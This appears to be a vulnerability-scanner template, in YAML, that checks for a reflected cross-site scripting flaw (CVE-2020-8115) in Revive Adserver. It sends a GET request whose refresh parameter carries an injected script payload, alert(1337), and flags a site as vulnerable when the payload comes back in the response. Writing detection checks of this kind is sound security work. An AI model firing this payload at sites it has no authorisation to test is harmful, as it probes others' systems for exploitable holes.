20 lines
384 B
YAML
20 lines
384 B
YAML
id: CVE-2020-8115
|
|
|
|
info:
|
|
name: Revive Adserver XSS
|
|
author: madrobot
|
|
severity: medium
|
|
|
|
requests:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/www/delivery/afr.php?refresh=10000&\")',10000000);alert(1337);setTimeout('alert(\""
|
|
matchers:
|
|
- type: status
|
|
status:
|
|
- 200
|
|
- type: word
|
|
words:
|
|
- "alert(1337)"
|
|
part: body
|